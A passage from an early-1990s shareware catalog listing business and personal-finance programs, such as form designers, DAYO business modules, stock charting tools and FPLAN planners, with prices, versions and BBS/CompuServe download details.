A specialized cataloging system designed specifically for + professional books, technical papers and other publications. + Each publication can be cataloged by up to 20 criteria all of + which can be searched, cross referenced, sorted and + alphabetized. Searches can be based on keywords, subjects, + title, author or any other information you've included in your + catalog. Fast BTrieve index based searches can find any entry + in less than 2 seconds. Includes user definable printed + reports. + + Chapter 8, "Business" 205 + + + + Product: ORGANIZE! Your Books/Magazines [***] + Cataloging system for books & magazines. See full description + on page 323. + + Product: ORGANIZE! Your CDs & Records [***] + Cataloging system for CDs, LPs and tapes. See full description + on page 324. + + 8.7.4 Legal & law enforcement + + Product: CHRONOS [***] + Interactive historical timelines. See full description on + page 299. + + + 8.8 Forms generators + + Product: BESTTEST + Full-featured test preparation program. See full description + on page 295. + + Product: FormGen + Needs: IBM PC, DOS 3.2 or better. + Author: FormGen Corp., 416-857-4141 + Registration: $35.00 + Version: 4.1a (12-19-90) + User benefits: Printed manual, master disks, unlimited technical + support, product discounts. + Look for: FORM41A.EXE on BBSs; FORM41.EXE in IBMAPP forum LIB 6 + on CompuServe. + Download size: 107k + Description: + The world's most popular form drawing package. Powerful, yet + easy-to-use package works like a word processor, with many + features specially geared to designing forms. Using the full + screen editor, you can quickly draw lines and boxes. Then print + the form on your Epson, IBM or HP type printer. The printed + results are amazing! Professional quality forms in minutes! + + Product: PCForm + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: CareWare, 916-477-6024 + Registration: $25.00 + Version: 2.3 (01-25-92) + User benefits: Phone/CompuServe/mail support. + Look for: availability unknown on BBSs; PCF23.EXE in IBMAPP forum + LIB 6 on CompuServe; PCF23.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 143k + Description: + Offers an easy means for creating tailored made professional + looking forms, graphs, and line drawings. Features: ease of + use, word processing like entry and editing, new HP LaserJet + and multiple copies printing, comprehensive file management, + auto-tab for easy fill-in, two point line and box drawing, + + Chapter 8, "Business" 206 + + + + block editing, multiple pages, pull down menus, mouse support, + configurability, PIF and ICO files, ASCII format for maximum + compatibility and more. + + Product: PostCardMaster + PostCard & Mail Handling System. See full description on + page 145. + + 8.8.1 Forms fillers + + Product: Badge-O-Magic + LaserJet Nametags Using Any dBASE III File. See full + description on page 53. + + Product: Federal Express Label Printer + Needs: IBM PC, DOS 2.0 or better. + Author: TVSware, 908-774-6402 + Registration: $35.00 + Version: 1.01a (01-11-91) + User benefits: Disk and printed manual; free unlimited technical + support. + Look for: FEDEX101.ZIP on BBSs; FEDEX.EXE in IBMAPP forum LIB 9 + on CompuServe. + Download size: 167k + Description: + Prints FedEx labels. + + Product: FormGen Fill + Needs: IBM PC, DOS 3.2 or better. + Author: FormGen Corp., 416-857-4141 + Registration: $35.00 + Version: 1.5 (12-19-90) + User benefits: Printed manual, master disks, unlimited technical + support, product discounts. + Look for: FILL15.EXE on BBSs; FILL15.EXE in IBMAPP forum LIB 6 on + CompuServe. + Download size: 163k + Description: + From the makers of FormGen, the world's most popular form + drawing system, comes a powerful, yet easy-to-use form filling + system. This companion for FormGen puts data areas on your + forms. The form may then be filled & printed - picture perfect + every time. Features: muti-line fields, calculations, date & + time and much more. Context sensitive help makes it easy to + learn and use. Forms are printed on your Epson, IBM, or HP + printer. + + Chapter 8, "Business" 207 + + + + Product: MORFORM + Needs: IBM PC, DOS 2.1 or better. Hard disk, 480k RAM. + Author: MORSOFT, 512-561-0731 + Registration: $39.95 + Version: 1.0 (03-01-91) + User benefits: Printed manual, phone support, one free upgrade, + 50 additional business and miscellaneous forms. + Look for: availability unknown on BBSs; MORFR*.ZIP in IBMAPP + forum LIB 6 (multiple files) on CompuServe; MORFORM*.ZIP in + IBMPC RTC LIB 3 (multiple files) on GEnie. + Download size: 500k + Description: + Save time and money every day with this complete forms + management system. Create customized forms quickly and easily + with automatic box and line drawing. Fill them out with full + data entry capabilities including automatic computations, + multiple choice selections, customized field help, automatic + date and time stamping, incremental numbering, and each form + may be 1 to 30 pages in length. Then print them using all of + the fonts available on your printer for a professional look. + + Product: STAFF-MASK + Custom designed RETRIEVE/EDIT/ADD/DELETE Mask. See full + description on page 139. + + 8.8.2 Forms processing + + Product: MORFORM + Complete forms management system. See full description on + page 206. + + Product: Over_LAZ + HP LaserJet overlays and letterheads. See full description on + page 57. + + Product: Over_LAZ PS + PostScript overlays and letterheads. See full description on + page 59. + + Product: WAMPUM + Menu-Driven dBASE-Compat. DBMS in a 20K TSR. See full + description on page 139. + + Product: XPENS + Expense Account Reporting Program. See full description on + page 181. + + Product: Zephyr + FoxPro-Compatible DBMS for Non-Programmers. See full + description on page 140. + + Chapter 8, "Business" 208 + + + + 8.8.3 Forms collections + + Product: FormGen Business Collection + Needs: Unknown. FormGen. + Author: FormGen Corp., 416-857-4141 + Registration: $0.00 + Version: 1.0 (07-23-90) + User benefits: Technical support. + Look for: availability unknown on BBSs; FORM-B.EXE in IBMAPP + forum LIB 6 on CompuServe. + Download size: 44k + Description: + Contains over 70 common business forms for use with FormGen. + Invoices, purchase orders, time sheets and much more! Nearly + any form you can think of for business can be found in this + collection. You can add your company name, make any changes + you want, and your form is ready. + + Product: FormGen Home Collection + Needs: Unknown. FormGen. + Author: FormGen Corp., 416-857-4141 + Registration: $0.00 + Version: 1.0 (07-23-90) + User benefits: Technical support. + Look for: availability unknown on BBSs; FORM-H.EXE in IBMAPP + forum LIB 6 on CompuServe. + Download size: 33k + Description: + Contains over 50 useful forms for home an hobby. Everything + from golf and bowling scoresheets to grocery lists and movie + logs can be found in this collection. Use the forms "as is", or + change them to suit your taste. + + + 8.9 Sales aids + + Product: CATALOG-ON-A-DISK [***] + Needs: IBM PC, DOS 2.1 or better. + Author: EmmaSoft, 607-533-4685 + Registration: $55.00 + Version: 2.00 (03-15-92) + User benefits: Printed manual, master disks, support. + Look for: CATALG30.ZIP on BBSs (call 607-533-7072 to download it + at no charge); CATALG.ZIP in ZNT:UTILFOR forum LIB 8 on + CompuServe. + Download size: 195k + Description: + Just what you need to distribute your product catalog to + computer-using customers! Your customers will love how easy it + is to find products they want with the press of a few keys. AND + they can order them right in the program: it prints out the + order form, too! Your special message (Company Name, Phone, + Address) appears at the top of the screen and order form. + + Chapter 8, "Business" 209 + + + + Product: DAYO PRICE BOOK + Needs: IBM PC, DOS 3.3 or better. 530K RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $45.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOBE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOBE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOBE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 230k + Description: + A system of creating and maintaining specialized pricing for + your customer/clients. Special printouts (Price Books/Catalogs) + may be printed to a standard printer, or to a Hewlett Packard + (tm) Laserjet or compatible. It requires the presence of DAYO + Inventory and DAYO POS (Point of Sale) programs/databases. + Special Price Book methods include Fixed, Margin/Cost Plus, and + List/Retail discounts. + + Product: Home Sales System + Avon(tm) Billing & Ordering program. See full description on + page 211. + + Product: MakeDemo + Presentation program with interactive menuing. See full + description on page 167. + + + 8.10 Marketing + + Product: Business Plan Master (IBM) [***] + Professional business plan templates. See full description on + page 198. + + Product: Business Plan Master (Mac) [***] + Professional business plan templates. See full description on + page 198. + + Product: Japanese Business Culture [***] + Needs: IBM PC, DOS 3.3 or better. VGA monitor. Mouse + recommended. + Author: Niche Software, 714-892-9052 + Registration: $5.00 + Version: 1.1 (03-23-92) + User benefits: Mail support. + Look for: JAP.ZIP on BBSs (call 714-636-2667 to download it at no + charge). + Download size: 260k + Description: + The purpose of the kit is to help your organization to prepare + for successful business transactions with the Japanese. Common + themes presented are to exercise patience,to respect + formalities, to expect to spend time establishing a + + Chapter 8, "Business" 210 + + + + relationship,and to be sensitive to the culture. The option is + here for modifying the text portions with material specific to + the needs of an individual company. Features animation,scrolled + text,music,graphics. + + Product: Multilevel Marketing Simulator + Needs: IBM PC, DOS 2.0 or better. 640k RAM. + Author: LRV Company, 516-360-9178 + Registration: $39.00 + Version: 2.00 (06-28-91) + User benefits: Current disk, print manual, Tech support by Mail, + CompuServe, 24 hr. phone. First upgrade free. May contribute + material for possible inclusion in next release. + Look for: MLM$V200.EXE on BBSs; MLM200.EXE in USEN forum LIB 10 + on CompuServe. + Download size: 234k + Description: + A no holds barred look at MLM. Demonstrates how downlines can + grow to yield a 6 figure income in a hostile, competitive + environment. Users input details of marketing plan, product + acceptance, promotional budgets & strategies. Program projects + downlines, costs, retail profits, commissions, purchases, cash + status for each individual. Warns of unprofitable situations. + + Authorized distribution package explains MLM basics, includes + documentation and examples. + + Product: Sell More Software + Needs: IBM AT (80286), DOS 3.1 or better. 512k RAM. + Author: Droege Computing Services, Inc., 919-383-9749 + Registration: $100.00 + Version: 3.0 (12-31-91) + User benefits: User Manual, newsletter, software support, notice + of updates. + Look for: SELLMOR*.ZIP on BBSs. + Download size: 500k + Description: + Designed to facilitate the marketing, sales, and administrative + activities involved in selling computer software. Created + specifically for software developers and value-added re- + sellers, the program helps to plan projects, track contact with + prospects and clients, track support, and print custom letters + and forms. + + Product: Service Business Design [***] + Service Business Design,Electronic Lecture. See full + description on page 201. + + + 8.11 Work-at-home + + See also: Home & hobby (page 318). + + Chapter 8, "Business" 211 + + + + Product: Business Plan Master (IBM) [***] + Professional business plan templates. See full description on + page 198. + + Product: Business Plan Master (Mac) [***] + Professional business plan templates. See full description on + page 198. + + Product: Home Sales System + Needs: IBM PC, DOS 3.0 or better. Hard disk. + Author: Grumpyware, 214-340-5231 + Registration: $50.00 + Version: 3.2 (02-04-92) + User benefits: Printed manual, CompuServe support. + Look for: SALES.EXE on BBSs (call 214-457-8708 to download it at + no charge); SALES.EXE in HOME forum LIB 3 on CompuServe. + Download size: 192k + Description: + Designed for Avon(tm) representatives to automate the customer + billing and product ordering process. Prints bills, order + sheets, customer call lists, customer labels, End of Campaign + reports, and much more. + + Product: Money Smith + Home Accounting Package for Windows 3.0. See full description + on page 224. + + Product: Multilevel Marketing Simulator + Examines & compares MLMs for income potential. See full + description on page 210. + + + 8.12 Training aids + + See also: Education, Computers (page 289). + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 124. + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 381. + + + 8.13 Business utilities + + Product: AFFORD IT??? + Monetary calculator (annuities,savings,loans). See full + description on page 230. + + Chapter 8, "Business" 212 + + + + Product: METRIC-X + Needs: IBM PC, DOS 2.11 or better. + Author: Orion Development Corporation, 800-992-8170 + Registration: $25.00 + Version: 1.10 (01-10-92) + User benefits: Printed manual, 51/4' & 31/2' master disks, one year + mail support. + Look for: MX-110.ZIP on BBSs (call 703-425-2505 to download it at + no charge); MX-110.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 150k + Description: + This Metric-English-Metric Conversion Utility uses efficient + drop-down menus to display/select any of 10 Categories and 138 + Units of Measure. This program has been DESIGNATED by the U.S. + Interagency Council on Metric Policy (ICMP) - Metric Operating + Committee, as an ACCEPTED METRIC CONVERSION TOOL. Very user- + friendly, very accurate (using double-precision calcuations) + and is a professional-grade conversion utility. Based upon: + ANSI/IEEE Std-268-1987. + + Product: ORGANIZE! Your Home [***] + Home/office inventory system. See full description on + page 353. + + Product: Personal Time Card [***] + Electronic Time Card. See full description on page 90. + + Product: VMiX 386 + MSDOS MultiTasker MultiUser for 8086 to 486. See full + description on page 62. + + + 8.14 Software tools + + 8.14.1 For other + + Product: Badge-O-Magic + LaserJet Nametags Using Any dBASE III File. See full + description on page 53. + + Chapter 8, "Business" 213 + + + + Product: DAYO INDEX + Needs: IBM PC, DOS 3.3 or better. 500k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $25.00 + Version: 3.0 (06-28-91) + User benefits: Unlimited Records, Manual (printed & disk), Phone + Support. + Look for: DAYOXE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOXE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOXE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 250k + Description: + Designed to manage the indexing of the DAYO databases. DAYO + applications all have multiple indexes, and because it is + recommended that they be reindexed at least once daily, DAYO + Index was created to simplify this process. + + Product: DAYO PASSWORDS + Needs: IBM PC, DOS 3.3 or better. 450k RAM; Hard Disk; DAYO + modules. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $35.00 + Version: 3.0 (06-28-91) + User benefits: Security, Manual (printed & disk), Phone Support. + Look for: DAYOIDE.EXE on BBSs (call 407-292-4921 to download it + at no charge); DAYIDE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOIDE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 250k + Description: + Provides DAYO Business Application users with a system of + database security through the use of passwords. Its use is + optional, but recommended in areas where more than one person + has access to the data. + + Product: Early Bird + Great Full-Featured Reminder/Calendar Program. See full + description on page 79. + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real Batch Language you wish DOS had. See full description + on page 65. + + Product: HyperPAD + The HyperMedia Platform for MS-DOS. See full description on + page 273. + + Product: PREP + Create Run-Time Mult-Choice Tests/Drills. See full description + on page 300. + + Chapter 8, "Business" 214 + + + + 8.15 Other + + Product: DAYO LOOKUP + Needs: IBM PC, DOS 3.3 or better. 450K RAM; Hard Disk; DAYO + Modules. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $35.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support, Security. + Look for: DAYOLE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOLE.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 270k + Description: + A routine for DAYO users to view data from any DAYO database or + dBase (tm) compatible database (.DBF). No editing is allowed. + This provides a 'safe' tool for users that do not have the need + to make changes to the databases. Has multi-level passwords. + + Product: DAYO SMART REPORTS + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $50.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Manual (printed & disk), Phone Support. + Look for: DAYORE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYORE.ZIP in IBMAPP forum LIB 6 + (multiple files) on CompuServe; DAYORE.ZIP in IBM RTC LIB 3 + (multiple files) on GEnie. + Download size: 320k + Description: + Contains many reports/routines that will help you manage your + purchasing, inventory, invoices, backorders, sales, and your + databases. There are MANY Reports, Lists and Routines included + in Smart Reports, ie: Single Warehouse, Valuation Expanded, + ReOrder, Late PO, Margin (History), Vendor List, Customer List, + Inventory Item List, Expenses List, Warehouse Adjustments, HP + Laser Pull Sheet, Available Inventory, GL Posting Problems, + View Reports On Screen, and MANY more! + + Product: Ethics Awareness [***] + Ethical Decision Making for business. See full description on + page 358. + + Product: KICK + Motivational/Inspirational Messages. See full description on + page 160. + + Product: PCStat + Easy to use statistical report program. See full description + on page 256. + + Chapter 9, "Finances" 215 + + + + + + Chapter 9 + Finances + + See also: Spreadsheet applications (page 135); Mathematics + (page 254); Business (page 172). + + + 9.1 Stock trading & analysis + + Product: Capital Gainz [***] + Investment portfolio manager. See full description on + page 229. + + Product: PC Chart (CGA/HGC) + Needs: IBM PC, DOS 2.0 or better. CGA or Hercules monitor; 512k + RAM. Modem optional. + Author: Guru Systems Ltd., 604-299-1010 + Registration: $99.00 + Version: 1.4 (01-01-92) + User benefits: 30 data files (DOW 30 Industrials), data + conversion utility program (Supports Prodigy and Telescan + 2000), high-quality spiral-bound manual. + Look for: PCC14*.ZIP (multiple files) on BBSs; PCC14.ZIP in + INVFORUM forum LIB 12 on CompuServe; PCC14.ZIP in INVESTOR'S + RTC LIB 3 on GEnie. + Download size: 335k + Description: + Bullish on the market? Or bearish? This program will help you + decide! It brings you a comprehensive set of technical + analysis tools to help you decide when to buy and sell stocks + and commodities. Mathematical algorithms help you determine + what action to take. The spreadsheet-like interface permits + easy editing and manual updating of up to 400 price files. For + anyone who prefers automatic updating, Lets you use All- + Quotes, Dial/Data, and GEnie to get price updates via modem. + + Chapter 9, "Finances" 216 + + + + Product: PC-CHART (EGA/VGA) + Needs: IBM PC, DOS 2.0 or better. EGA monitor, 512k RAM. Modem + optional. + Author: Guru Systems Ltd., 604-299-1010 + Registration: $99.00 + Version: 1.4 (01-01-92) + User benefits: 30 data files (Dow 30 Industrials), data + conversion utility program which supports Prodigy and Telescan + 2000, high-quality spiral-bound manual. + Look for: PCC14C*.ZIP (multiple files) on BBSs; PCC14C.ZIP in + INVFORUM forum LIB 12 on CompuServe; PCC14C.ZIP in INVESTORS' + RTC LIB 3 on GEnie. + Download size: 324k + Description: + Bullish on the market? Or Bearish? This program will help you + decide! It brings you a comprehensive set of technical + analysis tools to help you decide when to buy and sell stocks + and commodities. Mathematical algorithms help you determine + what actions to take. The spreadsheet-like interface permits + easy editing and manual updating of up to 400 price files. For + anyone who prefer automatic updating. Lets you use All-Quotes, + Dial/Data, and GEnie to get price updates via modem. + + Product: PRO$TOCK + Needs: IBM PC, DOS 3.0 or better. Prodigy software. Hard disk. + Author: Gateway Software + Registration: $29.00 + Version: 1.5 (05-01-91) + User benefits: One free update - set of disks - Latest version. + Look for: PROS15.ZIP on BBSs; PROS15.ZIP in IBMCON forum LIB 2 on + CompuServe; PROS15.ZIP in IBM 615;3 RTC LIB 6 on GEnie. + Download size: 250k + Special instructions: Product distribution restricted to the + United States. + Description: + This software package compatible with Prodigy software lets + you: + v/ Define off-line up to 9 different lists of more than 1,000 + stock quotes (also bonds and mutual funds) + v/ Create lists of stocks symbols from scratch, or from + Metastock files + v/ Download daily in unattended mode predefined list of stock + quotes + v/ Browse, print and convert stock quotations (spreadsheet, + Lotus 1-2-3, Quicken 4.0) + C source kit included so you can write your own conversion + program. + + Chapter 9, "Finances" 217 + + + + Product: Stable - Technical Graphs + Needs: IBM PC, Windows 3.0 or better. + Author: WINTERRA Software Group, 303-470-6323 + Registration: $49.95 + Version: 1.00 (09-25-91) + User benefits: Latest version with printed manual; support via + phone/fax/CompuServe; special offer free CompuServe IntroPak; + major upgrade/feature pre-release notification; beta test + eligibility. + Look for: STABLE10.ZIP on BBSs; STABLE.ZIP in INVFORUM forum LIB + 1 on CompuServe. + Download size: 138k + Description: + A powerful, yet easy to use technical analysis program written + specifically for the Microsoft Windows environment. Combines + some of the more popular technical analysis indicators - with + the graphical capabilities of Windows - to display and print + quality indicator studies used to analyze stocks, bonds, + options, etc. A unique chart "slider" allows quick comparisons + of important indicator events across all graphs. Reads + MetaStock(TM) v2.5 and ASCII data files. + + Product: $tokTraX + Stock portfolio and charting system. See full description on + page 230. + + Product: Total Investor for 1-2-3 + Needs: IBM PC, DOS 2.0 or better. CGA monitor. Lotus 1-2-3 v2.0 + or better, or Quattro Pro. + Author: Hughes Financial Services, 603-598-4676 + Registration: $35.00 + Version: 2.01A (06-01-91) + User benefits: Latest version mailed out along with one year of + data for all stocks in the DJIA. Support by phone and on CIS. + Look for: TI123.ARC on BBSs (call 312-280-8565 to download it at + no charge); TI123.ARC in LOTUS forum LIB 2 on CompuServe. + Download size: 170k + Description: + An integrated portfolio management and technical analysis tool + for the Lotus 1-2-3 and Quattro Pro environments. The program + keeps track of securities, charts stocks and makes buy/sell + decisions based on technical indicators. These indicators + include moving averages, relative strength, momentum, RSI, and + many others. Total Investor maintains current and historical + quotes. Utility products are available from HFS to link Total + Investor to Compuserve, DJN/R, and FNN Signal. + + Chapter 9, "Finances" 218 + + + + Product: Total Investor for Symphony + Needs: IBM PC, DOS 2.0 or better. CGA monitor; modem. Lotus + Symphony v1.1 or better. + Author: Hughes Financial Services, 603-598-4676 + Registration: $50.00 + Version: 2.01 (06-01-91) + User benefits: Latest version mailed out along with one year of + data for all stocks in the DJIA. Support by phone and on CIS. + Look for: TISYM.ARC on BBSs (call 312-280-8565 to download it at + no charge); TISYM.ARC in LOTUS forum LIB 6 on CompuServe. + Download size: 170k + Description: + An integrated portfolio management and technical analysis + template for use with Lotus Symphony. The program can be used + to keep track of securities, chart stocks, and make buy/sell + decisions based on technical indicators. These indicators + include moving averages, momentum, relative strength, RSI, and + many others. Total Investor updates both current quotes for + your portfolio and historical quotes for charting and analysis + through Dow Jones News Retrieval. + + Product: YieldBook + Bond Pricing Calculator. See full description on page 231. + + + 9.2 Personal finances + + See also: Business, Business finances (page 172). + + Product: AMORTZ + Needs: IBM PC, DOS 2.0 or better. + Author: Oregon Software Group, 503-643-0915 + Registration: $10.00 + Version: 1.30 (06-30-91) + User benefits: One year free upgrading, unlimited support. + Look for: AMORTZ13.ZIP on BBSs (call 503-297-4070 to download it + at no charge); AMORTZ.ZIP in IBMAPP forum LIB 4 on CompuServe; + AMORTZ13.ZIP in IBM PC RTC LIB 3 on GEnie. + Download size: 110k + Description: + A very "User Friendly" financial loan system designed to be + useful and understandable to everyone - from teens trying to + swing a car loan to CPAs working on million dollar deals. It + can calculate any of the loan variables (Principal, Interest + Rate, Payment Amount or Number of Payments), immediately show + loan totals, and then generate "Payback" schedules (on screen + or hardcopy) by year. Try it on your monthly mortgage payment + to see what a dramatic difference $50 per month can make! + + Product: C.A.R.S. [***] + The Complete Automobile Reporting System. See full description + on page 173. + + Chapter 9, "Finances" 219 + + + + Product: Chris's Automobile Recorder [***] + Vehicle Operation & Maint. Logger & Reminder. See full + description on page 351. + + Product: HOME BUDGET MANAGEMENT SYSTEM + Needs: IBM PC, DOS 2.1 or better. + Author: Brentson Worrell, 813-886-2282 + Registration: $35.00 + Version: 4.21 (05-20-91) + User benefits: Latest version disk, bypass Shareware screen, tech + support by phone or mail, future upgrades for greatly reduced + price. + Look for: HBMS421.ZIP on BBSs; HBMS42.ZIP in IBMAPP forum LIB 4 + on CompuServe; HBMS421.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 150k + Description: + An easy to use financial record-keeping and reporting system, + offering complete flexibility by way of user design. It has a + simple & fast data entry method, and extensive screen & printed + reports. Also included are checkbook reconciliation and + printing, fiscal year support, transaction editing ability, + budgeting, and automatic entries via "templates". A special + "Test Drive" through the included sample data will introduce + you to what the program has to offer. + + Product: LOANS & SAVINGS + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: Northland Multisoft, 818-963-6355 + Registration: $10.00 + Version: 1.01 (06-21-91) + User benefits: Six months of support, latest version on disk. + Look for: LO&SA1.ZIP on BBSs. + Download size: 80k + Description: + Figure loans, loan by payment, payoff, savings. Reports total + amount, total interest, total input or output on menu screen or + optionaly to printer. A calculator to assist you with your + figures and help screens. + * Plan your savings strategy. + * Know before you buy what the real cost is. + * Know how much will you save if you payoff now. + * Find out what you afford to buy. + + Product: PC-DEAL + Double Entry Ledger Accounting System. See full description on + page 175. + + Product: Peronal Record Keeper + Storage of personal and family information. See full + description on page 353. + + Chapter 9, "Finances" 220 + + + + Product: TAX91 + Needs: IBM PC, DOS 2.0 or better. Epson FX/LQ,IBM Proprinter,or + HP LaserJet. + Author: F. Roland Bjorklund, 301-645-6819 + Registration: $45.00 + Version: 1.0 (01-01-92) + User benefits: State program for 10 or more states. + Look for: availability unknown on BBSs. + Download size: 360k + Special instructions: Product distribution restricted to the + United States. + Description: + Allows tax preparers and individuals to prepare Federal Form + 1040 U.S. Individual Tax Returns including more than 34 + supporting schedules and forms. An IRS approved signature 1040 + for EPSON FX/LQ,IBM Proprinter,or HP Laserjet. State programs + for registered uses. Pulldown menus, mouse support, and + context help. A natural method of entering and reviewing tax + data including scrolling forms, and single button switching + between forms. Popup Calculator. Fees schedule. Front page. + Editor's note: The author claims to release yearly updates for + this software around December/January. + + Product: Total Investor for 1-2-3 + Portfolio Manager/Technical Analysis Template. See full + description on page 217. + + Product: Total Investor for Symphony + Portfolio Manager/Technical Analysis Template. See full + description on page 217. + + 9.2.1 Finances & budgets + + Product: ACCEL + Needs: IBM PC, DOS 2.1 or better. + Author: JSOFT, 612-823-7197 + Registration: $14.95 + Version: 1.0 (11-01-91) + User benefits: One year phone/BBS support, printed manual and + disk. + Look for: availability unknown on BBSs. + Download size: 30k + Description: + This menu driven program provides comparisons 4 different ways + of accelerating payments on a mortgage: paying a fixed amount + extra per month, paying the next month(s)'principal with no + maximum extra, paying the next month(s)' principal with a + maximum extra and paying bi-weekly. It has 5 different menu + options, 3 of which evaluate accelerated mortgage options, an + option to view the program documentation or print it and an + option to return to DOS. + + Chapter 9, "Finances" 221 + + + + Product: Cash Control + Needs: IBM PC, DOS 2.0 or better. 320k RAM. + Author: Adrian-Thomas Developments, Inc., 613-837-0684 + Registration: $29.95 + Version: 1.21S (01-01-91) + User benefits: EGA/VGA Color Graphics, Popup Calculator/Calendar, + Free technical support. + Look for: availability unknown on BBSs; CASHC.ZIP in IBMAPP forum + LIB 4 on CompuServe. + Download size: 150k + Description: + Manage your Checking, Savings or Charge Accounts the Fast and + Easy way. Enter your transactions in pop up windows while + viewing your Checkbook Register. Recall your frequently used + transactions. Be reminded when payments and deposits are due, + with optional advanced notification. Search for transactions + forwards or backwards. Split transactions. Transfer funds + between accounts. Balance your accounts. Generate reports. View + bar and pie charts. Batch printing of checks on matrix or + laser printers. + + Product: "Cheque-It-Out" + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Author: Hooper International, Inc., 719-528-8989 + Registration: $49.95 + Version: 1.1C (03-01-91) + User benefits: FREE unlimited technical support, latest version + of the program, printed/bound manual, graphics, pop-up + calculator, import/export, mouse support, account + reconciliation module, automated year-end closing and financial + utilities module. + Look for: availability unknown on BBSs; CIO.ZIP in PCVENC forum + LIB 5 on CompuServe. + Download size: 235k + Description: + A menu-driven, double-entry, personal accounting system + combining powerful bookkeeping methods with an easy-to-use, + full-featured design. Some features include passwords, pop-up + windows, context sensitive help, full range of accountant-ready + reports and pre/post dated transactions. Supports any checks + and any printers. Tracks income, expenses, assets, + liabilities, budgets and net worth. Works under Windows. Manage + your money like a financial whiz! + + Chapter 9, "Finances" 222 + + + + Product: EASY BANKING [***] + Needs: IBM PC, DOS 3.2 or better. 384k RAM. + Author: The Durol Company, 604-524-1765 + Registration: $28.50 + Version: 1.2 (01-01-92) + User benefits: Printed manual, master disks, support. + Look for: availability unknown on BBSs. + Download size: 600k + Description: + Simple to use yet sophisticated menu driven system for managing + business or personal banking information. Pop up windows on + screen help, bottom line prompts and a manual on disk for easy + use. Track checks, withdrawals, deposits and automatic monthly + payments or deposits. With up to 98 expense categories and up + to 98 accounts it can generate several hundred statements and + reports. Pop up calendar and calculator. Many maintenance and + configuration options. + + Product: EliteCheck + Extremely easy checkbook/budget management. See full + description on page 228. + + Product: FPLAN-Captital Needs Planner + Needs: IBM PC, DOS 2.0 or better. + Author: First Financial Software, 407-352-2529 + Registration: $30.00 + Version: 3.0 (04-21-91) + st + User benefits: Free 800 Phone Support, Free 1 Upgrade, 50% off + other Upgrades, 20% off other FPLAN progs. + Look for: availability unknown on BBSs. + Download size: 323k + Description: + A total capital needs (life insurance) planner designed for + easy use. Included are automatic demonstrations for each of the + functions to familiarize you with the program. All of your + data, from a comprehensive questionnaire, can be entered into + the program to determine the status of your desired capital + needs situation and printed out. Great for helping you achieve + the optimum situation for support of dependents in case of + premature death. + + Chapter 9, "Finances" 223 + + + + Product: FPLAN-Education Funding Planner + Needs: IBM PC, DOS 2.0 or better. + Author: First Financial Software, 407-352-2529 + Registration: $30.00 + Version: 3.0 (04-21-91) + st + User benefits: Free 800 Phone Support, Free 1 Upgrade. 50% off + other Upgrades, 20% off other FPLAN Progs. + Look for: availability unknown on BBSs. + Download size: 335k + Description: + A total college funding planner designed for easy use. Included + are automatic demonstrations for each of the functions to + familiarize you with the program. All of your data from a + comprehensive questionnaire, can be entered into the program to + determine the status of your desired college funding situation + and printed out. Great for helping you achieve your college + funding goals. + + Product: FPLAN-Income Protection Planner + Needs: IBM PC, DOS 2.0 or better. + Author: First Financial Software, 407-352-2529 + Registration: $30.00 + Version: 3.0 (04-21-91) + st + User benefits: Free 800 Phone Support, Free 1 Upgrade, 50% off + other Upgrades, 20% off other FPLAN progs. + Look for: availability unknown on BBSs. + Download size: 296k + Description: + A total income protection (disability) planner designed for + easy use. Included are automatic demonstrations for each of the + functions to familiarize you with the program. All of your + data, from a comprehensive questionnaire, can be entered into + the program to determine the status of your desired income + protection status, if disabled and printed out. Great for + helping you achieve the optimum financial situation for income + protection. + + Product: FPLAN-Personal Financial Plnr + Needs: IBM PC, DOS 2.0 or better. + Author: First Financial Software, 407-352-2529 + Registration: $30.00 + Version: 3.0 (04-21-91) + st + User benefits: Free 800 Phone Support, Free 1 Upgrade, 50% off + other upgrades, 20% off other FPLAN Progs. + Look for: availability unknown on BBSs. + Download size: 660k + Description: + A total financial analysis planner designed for easy use. All + of your data, from a comprehensive questionnaire, can be + entered into the program to determine the status of your + personal financial situationconcerning: Budgeting (Income & + + Chapter 9, "Finances" 224 + + + + Expenses), Balance Sheet (Assets & Liabilities), and Net Worth. + Economic Assumptions (Inv Rates, Inflation & Taxes). College + Funding Requirements, Retirement, Captial Needs & Income + Protection Analysis included. Great for helping achieve + financial planning goals. + + Product: FPLAN-Retirement Planner + Needs: IBM PC, DOS 2.0 or better. + Author: First Financial Software, 407-352-2529 + Registration: $30.00 + Version: 3.0 (04-21-91) + st + User benefits: Free 800 Phone Support, Free 1 Upgrade, 50% off + other Upgrades, 20% off other FPLAN Progs. + Look for: availability unknown on BBSs. + Download size: 335k + Description: + A total retirement planner designed for easy use. Included are + automatic demonstrations for each of the functions to + familiarize you with the program. All of your data, from a + comprehensive questionnaire, can be entered into the program to + determine the status of your desired retirement situation and + printed out. Great for helping you achieve your retirement + goals. + + Product: Loan Amortization + Needs: IBM PC, DOS 2.0 or better. + Author: 